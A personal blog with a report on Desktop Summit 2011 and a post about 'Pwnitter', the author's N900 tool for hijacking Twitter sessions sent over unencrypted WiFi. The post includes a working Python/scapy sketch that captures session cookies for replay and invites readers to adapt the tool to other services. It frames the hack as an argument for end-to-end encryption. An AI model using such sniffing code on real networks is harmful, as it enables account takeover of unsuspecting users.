Desktop Summit 2011 in Berlin

This year's GUADEC^W Desktop Summit took place in Berlin. Sure thing that I attended 🙂 Due to loads of stuff happening in the meantime, I didn't get around to actually writing about it. But I still want to mention a few things.

It was, as always, pretty nice to see all the faces again and catch up. The venue was almost excellent, with good lecture halls and infrastructure, although the wireless was a bit flaky and spots to sit down and get together were sparse. Anyway, I have never seen so many actual or wannabe users. Being in the heart of Germany's capital definitely helped to make ourselves visible. Funnily enough, I met some folks whom I had chatted up at LinuxTag while I was presenting GNOME. I invited them to come to the Desktop Summit, and so they did \o/

There were many talks, and I missed most of them. In fact, I was volunteering and meeting people, so I couldn't attend many lectures. But there was nothing I regret not having seen. The ones I did see were interesting enough, but not groundbreaking. There's a good summary over here.

We tried to record the talks, but for technical reasons it didn't work out of the box: the network was too slow and no disks were available. We convinced the guy in charge to let us buy disks, which eventually got used, but I actually don't know whether the lectures will be released at all.

A nice surprise was Intel giving away ExoPCs. In return, they required you to sit and listen to presentations about their app store thingy called "AppUp". Apparently it's a technology that tries to resemble OBS (distributing software via the web) and .deb files + Synaptic (distributing software with a native GUI), with an additional payment layer in between. But it fails big time to do so: not only can it not build binaries out of the sources you give it, it also can't track dependencies. Welcome to 2011. Needless to say, it's heavily targeted at Windows. Double fail that you can't build Windows software for their store without having a Windows platform (and development tools) yourself.

The PC itself is neat. It's a full tablet with only one soft key. The MeeGo version that came with it was out of date, though, and updating was a major pain in the afternoon. It involved getting a USB keyboard, because the on-screen keyboard would of course not show up when you opened a terminal. And you needed the keyboard, because you could of course not update the software any other way with that MeeGo version: there is no software management application at all. And most certainly, Intel's new AppUp thing is not included in the latest and greatest release. In fact, it's not even easily installable, as it involves googling for the RPM file and installing it manually. By now I have talked to Intel engineers, and it seems that an actual vendor is supposed to integrate their version of the AppUp thing into the rest of the OS, so Intel doesn't see itself in the position to do this. Other weird glitches include the hardware: while the ExoPC has a rotation sensor, it would be way too boring if it worked; so it doesn't. And the hardware turns itself off after a while. Just like that. It feels like we have at least three years of engineering left before we can start dreaming of shipping a tablet platform that is ready for day-to-day use. I have to note that the content-centric UI approach is definitely very handy. Let's hope it improves by fixing all those tiny things around the actual UI.

The discussion about a joint conference was bubbling up again. Of course. The main argument against a joint conference seems to be that meeting together slows GNOME's development down, because we have to give time to the other people and cannot run our own programme meanwhile. There are probably many variations of that argument, including that we do not collaborate anyway, so let's rather not invest time in a joint conference.

While I do agree that the current form of the conference is not necessarily optimal, I don't think that we should stop meeting up. At the end of the day, multiple (desktop) implementations or technologies are just pointless duplication. So let's rather try to unify and be a unity (haha, pun intended) instead of splitting up further. I am very well aware that this is technically unrealistic right now. But that's the future we should strive for, and we should work on making it possible, not work against it. So we don't necessarily need a fully joint conference. After all, our technologies do differ quite substantially, depending on how you look at it. But let's give each other the opportunity to learn about the other technologies and to talk to the key people. We might not fully make use of these opportunities yet, but if we design the conferences so that each camp has enough time to handle its internal issues and does a joint thing before or afterwards, then no harm is done if opportunities weren't taken.

Another hot topic was copyright assignments. There was a panel made up of interesting people, including Mark Shuttleworth. The discussion was alright, but way too short: they barely had 45 minutes, which made it less than 15 minutes each, barely enough to get a point across. And well, I didn't really understand the arguments *for* giving away any of your rights. It got really weird when Mark tried to make another point: it would be generous if a contributor donated their code to the company, and the participants should take into account that generosity is something contributors strive for. I haven't seen that point discussed anywhere yet, so let me start by saying that it is quite absurd. What could be more generous than giving your code to the public and ensuring that it stays freely available?! Just to be very clear: the GPL enables you to do exactly that: release code and ensure that it remains free.

I was delighted to see that the next GUADEC will take place in A Corunha. I'd rather have gone to Prague, though. But maybe the Czech team can be motivated to apply again next time.

Pwnitter

Uh, I totally forgot to blog about a funny thing that happened almost a year ago and which I have only mentioned in passing so far *blush*. So you probably know this Internet thing, and if you're one of the chosen and carefully gifted ones, you confuse it with the Web. And if you're very special, you do this Twitter thing and expose yourself and your communication patterns to some dodgy American company. By now, all of the following stuff isn't of much interest anymore, so you might as well quit reading.

It all happened while I was at FOSS.in. There was a contest run by Nokia which asked us to write some cool application for the N900. So I did. I packaged loads of programs and libraries to be able to put the wireless card into monitor mode. Then I wiretapped (haha) the wireless network and sniffed for Twitter traffic. Once a Twitter session was going on, the necessary authentication information was extracted and a message was posted on the poor user's behalf. I coined that Pwnitter, because it pwns you via Twitter.
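To illustrate the core idea (this is a minimal sketch, not the actual Pwnitter code), here is roughly what the sniffing part could look like in Python with scapy. It assumes an open network, an interface called wlan0 that is already in monitor mode, and a victim whose Twitter session runs over plain HTTP; it merely prints the captured session cookie, which is what you would then replay to post on the victim's behalf:

    # Hypothetical sketch, not the real Pwnitter implementation.
    from scapy.all import sniff, TCP, Raw

    def grab_twitter_cookie(pkt):
        # Only plain HTTP traffic is interesting -- the whole attack relies
        # on the session not being protected by TLS.
        if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt[TCP].dport == 80:
            payload = bytes(pkt[Raw].load)
            if b"twitter.com" in payload and b"Cookie:" in payload:
                for line in payload.split(b"\r\n"):
                    if line.startswith(b"Cookie:"):
                        # With this session cookie an attacker can replay an
                        # authenticated request, e.g. post a status update
                        # on the victim's behalf.
                        print("captured:", line.decode(errors="replace"))

    sniff(iface="wlan0", prn=grab_twitter_cookie, store=False)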

That said, we had great fun at FOSS.in, where nearly everybody's Twitter session got hijacked 😉 Eventually, people stopped using plain HTTP and moved to end-to-end encrypted sessions via TLS.

Anyway, my program didn't win anything because, as it turned out, Nokia wanted to promote QML, and hence we were supposed to write something that made use of it. My program barely has a UI… It is made up of one giant button…

Despite not getting lucky with Nokia, the community apparently received the thing very well.

So there is an obvious big elephant in the room asking why you would want to "hack" Twitter. I'd say it's rather easy to answer: the main point is that you should use end-to-end encryption when you communicate. And here comes the punchline: don't use a service that doesn't offer you that by default. Technically, it wouldn't be much of a problem to give you an encrypted link to send your messages over. However, companies tend to be cheap and let you suffer with a plain-text connection which can easily be tapped or, worse, manipulated. Think about it: if a company is too frugal to protect your communication from pimpled 13-year-olds with a WiFi card, why would you want to use its services?

By now (actually since March 2011, which is more than six months ago AFAIK), Twitter has SSL enabled by default, as far as I can tell. So let's not bash Twitter for not having offered an encrypted link for more than five years (they were founded back in 2006). But there are loads of other services that suffer from the very same basic problem, including Facebook. And it would be easy to adapt the existing solution to stuff like Facebook, flickr, whatnot.

A notable exception is Google, though. As far as I can see, they offer encryption by default, except for search. If there is an unencrypted link, I invite you to grab the sources of Pwnitter and build your own hack.

If you do so, let me give you a piece of advice, as I was going nuts over a weird problem with my Pwnitter application for Maemo. It's written in Python, and when building the package with setuptools the shebang would automatically be changed to “#!/scratchbox/tools/bin/python” instead of, say, “#!/usr/bin/python”.

I tried tons of things for many hours until I realised that scratchbox redirects some binary paths.

However, that did not help me fix the issue. As it turned out, my problem was that I didn't depend on a Python runtime at build time. Hence the build server picked scratchbox's Python, which was located in /scratchbox/bin.
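For illustration, the fix boils down to declaring that build dependency. A hypothetical debian/control fragment could look like the following; the package names are an assumption and not necessarily what Pwnitter uses, the point is just that pulling in a Python build dependency makes the build use /usr/bin/python rather than scratchbox's own interpreter:

    # Hypothetical debian/control fragment; package names are assumed.
    # Declaring a Python build dependency lets the build find /usr/bin/python
    # instead of scratchbox's /scratchbox/tools/bin/python.
    Source: pwnitter
    Build-Depends: debhelper (>= 5), python-dev, python-setuptools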

This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License.